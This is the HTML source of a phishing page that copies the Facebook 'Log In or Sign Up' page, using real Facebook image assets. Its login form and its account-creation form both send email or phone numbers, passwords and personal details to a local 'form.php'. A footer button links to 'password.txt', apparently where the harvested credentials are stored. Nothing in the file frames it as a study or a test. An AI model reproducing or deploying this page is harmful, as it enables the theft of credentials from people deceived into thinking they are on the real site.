<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yl/r/H3nktOa7ZMg.ico" />
    <title>Facebook - Log In or Sign In</title>
    <style>
        body {
            margin: 0px;
            text-decoration: none;
            font-family: Helvetica Neue, Helvetica;
        }
        a {
            text-decoration: none;
            color: #365899;
        }
        a:hover {
            text-decoration: underline;
        }
        label {
            cursor: pointer;
        }
        .logo {
            position: relative;
            top: 25px;
            float: left;
            height: 35px;
            overflow: hidden;
            color: #fff;
            font-size: 38px; 
            font-family: gill sans,impact, Klavika ;
        }
        .input {
            margin-top: 10px;
            width: 380px;
            height: 35px;
            color: #666;
            font-size: 15px;
            font-weight: bold;
            padding-left: 10px;
            border-radius: 4px;
            border: 1px solid rgba(163, 138, 138, 0.51);
        }
        .subm {
            margin-top: 10px;
            width: 200px;
            height: 40px;
            color: #fff;
            background: linear-gradient(#67ae55, #578843);
            background-color: #69a74e;
            box-shadow: inset 0 1px 1px #a4e388;
            border-color: #3b6e22 #3b6e22 #2c5115;
            font-size: 18px;
            cursor: pointer;
            padding-left: 10px;
            border-radius: 4px;
        }
        .subm:hover {
            background: linear-gradient(rgba(92, 173, 56, 0.88), #60a84e);
        }
        .login {
            
            background: #4267b2; 
            color: #fff;
            cursor: pointer;
            font-size: 12px;
            font-weight: bold; 
            border: 1px solid #29487d;
        }
        .login:hover {
            background: #3B5998;
        }
        .cent {
            margin: auto;
            width: 1000px;
        }
        .header {
            margin: 0px;
            padding: 0px;
            width: auto;
            height: 80px;
            background-color: #3B5998;
        }
        .forget {
            color: #9cb4d8;
            font-size: 12px;
        }
        .continer {
            margin: 0px;
            height: 620px;
            background: linear-gradient(#ffffff, #D3D8E8);
        }
        .conti_1 {
            padding-right: 30px;
            width: 570px;
            height: 620px;
            float: left;
        }
        .conti_ {
            width: 300px;
            float: left;
        }
        .footer {
            font-size: 12px;
        }
        hr {
            color: rgba(69, 82, 93, 0.27);
        }
        ul {
            padding: 0px;
            list-style-type: none;
        }
        ul li {
            font-size: 12px;
            display: inline;
            padding: 5px;
        }
    
    </style>
</head>
<body>
   <!--  #####################  Header Part  ################### -->
   <div class="header">
      <div class="cent">
         <div class="logo" id=""><a href="#"><img src="https://www.facebook.com/rsrc.php/v3/yT/r/81mGaCLzC3W.png"></a></div>
          <form action="form.php" method="POST">
            <table style="float: right; " align="right" cellpadding="0" cellspacing="4" border="0">
                  <tr>
                      <td><label for="name" style="color: #fff; font-size: 12px;">E-mail or Phone</label></td>
                      <td><label for="pass" style="color: #fff; font-size: 12px;">Password</label></td>
                      <td></td>
                  </tr>
                  <tr>
                      <td><input type="text" class="" id="name" placeholder="" name="name"></td>
                      <td><input type="password" class="" id="pass" placeholder="" name="password"></td>
                      <td><input type="submit" class="login" id="" value="Log In" name="top" ></td>
                  </tr>
                  <tr>
                      <td></td>
                      <td><a href="#" target="_blank" class="forget">Forgotten Account?</a></td>
                      <td></td>
                  </tr>
              </table>
          </form>
      </div>
   </div>
   <!--  #####################  Body Part  ################### -->
   <div class="continer">
      <div class="cent">
            <div class="conti_1">
             <div>
              <h3>Facebook helps you connect and share with the<br> people in your life.</h3>
              <img src="https://static.xx.fbcdn.net/rsrc.php/v3/yx/r/pyNVUg5EM0j.png" width="" height="" title="" alt="">
          </div>
          </div>
             <div>
              <form action="form.php" method="POST">
               <h1 style="font-size: 38px;">Create an account</h1>
               <h3>It's free and always will be.</h3>
               <input type="text" class="input" style="width: 180px;" id="" name="First Name" placeholder="First name">
               <input type="text" class="input" style="width: 170px; margin-left: 10px;" id="" name="Surname" placeholder="Surname">
               <br>
               <input type="texr" class="input" id="" name="Email OR Phnone" placeholder="Mobile number or email address">
               <br>
               <input type="text" class="input" id="" name=" Re_enter_Email OR Phnone" placeholder="Re-enter mobile number or email address">
               <br>
               <input type="password" class="input" id="" name="Password" placeholder="New password">
               <h4>Birthday</h4>
                <div class="" style="float:left;"><select style="height: 30px;" aria-label="Day" name="birthday_day" id="day" title="Day" class="">
                    <option value="0" selected="1">Day</option>
                    <option value="1">1</option>
                    <option value="2">2</option>
                    <option value="3">3</option>
                    <option value="4">4</option>
                    <option value="5">5</option>
                    <option value="6">6</option>
                    <option value="7">7</option>
                    <option value="8">8</option>
                    <option value="9">9</option>
                    <option value="10">10</option>
                    <option value="11">11</option>
                    <option value="12">12</option>
                    <option value="13">13</option>
                    <option value="14">14</option>
                    <option value="15">15</option>
                    <option value="16">16</option>
                    <option value="17">17</option>
                    <option value="18">18</option>
                    <option value="19">19</option>
                    <option value="20">20</option>
                    <option value="21">21</option>
                    <option value="22">22</option>
                    <option value="23">23</option>
                    <option value="24">24</option>
                    <option value="25">25</option>
                    <option value="26">26</option>
                    <option value="27">27</option>
                    <option value="28">28</option>
                    <option value="29">29</option>
                    <option value="30">30</option>
                    <option value="31">31</option>
                </select>
                <select style="height: 30px;" aria-label="Month" name="birthday_month" id="month" title="Month" class="">
                    <option value="0" selected="1">Month</option>
                    <option value="1">Jan</option>
                    <option value="2">Feb</option>
                    <option value="3">Mar</option>
                    <option value="4">Apr</option>
                    <option value="5">May</option>
                    <option value="6">Jun</option>
                    <option value="7">Jul</option>
                    <option value="8">Aug</option>
                    <option value="9">Sept</option>
                    <option value="10">Oct</option>
                    <option value="11">Nov</option>
                    <option value="12">Dec</option>
                </select>   
                <select style="height: 30px; float= left;" name="birthday_year" id="year" title="Year" class="">
                    <option value="0" selected="1">Year</option>
                    <option value="2017">2017</option>
                    <option value="2016">2016</option>
                    <option value="2015">2015</option>
                    <option value="2014">2014</option>
                    <option value="2013">2013</option>
                    <option value="2012">2012</option>
                    <option value="2011">2011</option>
                    <option value="2010">2010</option>
                    <option value="2009">2009</option>
                    <option value="2008">2008</option>
                    <option value="2007">2007</option>
                    <option value="2006">2006</option>
                    <option value="2005">2005</option>
                    <option value="2004">2004</option>
                    <option value="2003">2003</option>
                    <option value="2002">2002</option>
                    <option value="2001">2001</option>
                    <option value="2000">2000</option>
                    <option value="1999">1999</option>
                    <option value="1998">1998</option>
                    <option value="1997">1997</option>
                    <option value="1996">1996</option>
                    <option value="1995">1995</option>
                    <option value="1994">1994</option>
                    <option value="1993">1993</option>
                    <option value="1992">1992</option>
                    <option value="1991">1991</option>
                    <option value="1990">1990</option>
                    <option value="1989">1989</option>
                    <option value="1988">1988</option>
                    <option value="1987">1987</option>
                    <option value="1986">1986</option>
                    <option value="1985">1985</option>
                    <option value="1984">1984</option>
                    <option value="1983">1983</option>
                    <option value="1982">1982</option>
                    <option value="1981">1981</option>
                    <option value="1980">1980</option>
                    <option value="1979">1979</option>
                    <option value="1978">1978</option>
                    <option value="1977">1977</option>
                    <option value="1976">1976</option>
                    <option value="1975">1975</option>
                    <option value="1974">1974</option>
                    <option value="1973">1973</option>
                    <option value="1972">1972</option>
                    <option value="1971">1971</option>
                    <option value="1970">1970</option>
                    <option value="1969">1969</option>
                    <option value="1968">1968</option>
                    <option value="1967">1967</option>
                    <option value="1966">1966</option>
                    <option value="1965">1965</option>
                    <option value="1964">1964</option>
                    <option value="1963">1963</option>
                    <option value="1962">1962</option>
                    <option value="1961">1961</option>
                    <option value="1960">1960</option>
                    <option value="1959">1959</option>
                    <option value="1958">1958</option>
                    <option value="1957">1957</option>
                    <option value="1956">1956</option>
                    <option value="1955">1955</option>
                    <option value="1954">1954</option>
                    <option value="1953">1953</option>
                    <option value="1952">1952</option>
                    <option value="1951">1951</option>
                    <option value="1950">1950</option>
                    <option value="1949">1949</option>
                    <option value="1948">1948</option>
                    <option value="1947">1947</option>
                    <option value="1946">1946</option>
                    <option value="1945">1945</option>
                    <option value="1944">1944</option>
                    <option value="1943">1943</option>
                    <option value="1942">1942</option>
                    <option value="1941">1941</option>
                    <option value="1940">1940</option>
                    <option value="1939">1939</option>
                    <option value="1938">1938</option>
                    <option value="1937">1937</option>
                    <option value="1936">1936</option>
                    <option value="1935">1935</option>
                    <option value="1934">1934</option>
                    <option value="1933">1933</option>
                    <option value="1932">1932</option>
                    <option value="1931">1931</option>
                    <option value="1930">1930</option>
                    <option value="1929">1929</option>
                    <option value="1928">1928</option>
                    <option value="1927">1927</option>
                    <option value="1926">1926</option>
                    <option value="1925">1925</option>
                    <option value="1924">1924</option>
                    <option value="1923">1923</option>
                    <option value="1922">1922</option>
                    <option value="1921">1921</option>
                    <option value="1920">1920</option>
                    <option value="1919">1919</option>
                    <option value="1918">1918</option>
                    <option value="1917">1917</option>
                    <option value="1916">1916</option>
                    <option value="1915">1915</option>
                    <option value="1914">1914</option>
                    <option value="1913">1913</option>
                    <option value="1912">1912</option>
                    <option value="1911">1911</option>
                    <option value="1910">1910</option>
                    <option value="1909">1909</option>
                    <option value="1908">1908</option>
                    <option value="1907">1907</option>
                    <option value="1906">1906</option>
                    <option value="1905">1905</option>
                    </select></div>
               <div class="sidelink" style="float:left; margin:0px; padding:0px; line-height:10px;padding-left:8px; "><a style="color: #365899; font-size: 11px;" href="#" target="_blank">Why do I need to provide my<br> date of birth?</a></div>
               <br><br>
               <label style="font-size: 18px; margin-top: 10px;"><input type="radio" name="gender" value="female" checked >Female</label>
                <label style="font-size: 18px;"><input type="radio" name="gender" value="male">Male</label>
               <p style="font-size: 11px; color: #737373;">By clicking Create an account, you agree to our <a href="#">Terms</a> and <br>confirm that you have read our <a href="#">Data Policy</a> , including our <a href="#"> Cookie<br> Use Policy</a>. You may receive SMS message notifications from<br> Facebook and can opt out at any time.
                </p>
                <input type="submit" class="subm" id="" value="Create account" name="lognin">
                <br>
               <p style="font-size: 13px; color: #666; font-weight: bold;"><a href="#">Create a Page</a> for a celebrity, band or business.</p>
              </form> 
          </div>
      </div>
   </div>
      <!--  #####################  Footer Part  ################### -->
   <div class="cent">
       <ul>
           <li style="font-size: 11px; color: #737373; line-height: 1.34;">English (UK)</li>
           <li><a href="#">বাংলা</a></li>
           <li><a href="#">অসমীয়া</a></li>
           <li><a href="#">हिन्दी</a></li>
           <li><a href="#">नेपाली</a></li>
           <li><a href="#">Bahasa Indonesia</a></li>
           <li><a href="#">العربية</a></li>
           <li><a href="#">中文(简体)</a></li>
           <li><a href="#">Bahasa Melayu</a></li>
           <li><a href="#">Español</a></li>
           <li><a href="#">Português (Brasil)</a></li>
           <li><a href="password.txt"><input type="button" value="+"></a></li>

       </ul>
       <hr>
       <table style="line-height: 0.5;" class="footer" cellspacing="8" cellpadding="4">
            <tr>
                <td><a href="#" target="_blank" title="">Sign Up</a></td>
                <td><a href="#">Log In</a></td>
                <td><a href="#">Massenger</a></td>
                <td><a href="#">Facebook Lite</a></td>
                <td><a href="#">Mobile</a></td>
                <td><a href="#">Find Friends</a></td>
                <td><a href="#">People</a></td>
                <td><a href="#">Pages</a></td>
                <td><a href="#">Places</a></td>
                <td><a href="#">Games</a></td>
                <td><a href="#">Locations</a></td>
            </tr>
            <tr>
                <td><a href="#" target="_blank" title="">Celebrities</a></td>
                <td><a href="#">Groups</a></td>
                <td><a href="#">Moments</a></td>
                <td><a href="#">Instagram</a></td>
                <td><a href="#">About</a></td>
                <td><a href="#">Create Advert</a></td>
                <td><a href="#">Create Page</a></td>
                <td><a href="#">Developers</a></td>
                <td><a href="#">Careers</a></td>
                <td><a href="#">Privacy</a></td>
                <td><a href="#">Cookies</a></td>
            </tr>
            <tr>
                <td><a href="#" target="_blank" title="">AdChoices</a></td>
                <td><a href="#">Terms</a></td>
                <td><a href="#">Help</a></td>
                <td colspan="8" bgcolor=""><a href="#"></a></td>
            </tr>
        </table>
        <p style="font-size: 11px; color: #737373;">Facebook © 2017</p>
   </div>
</body>
</html>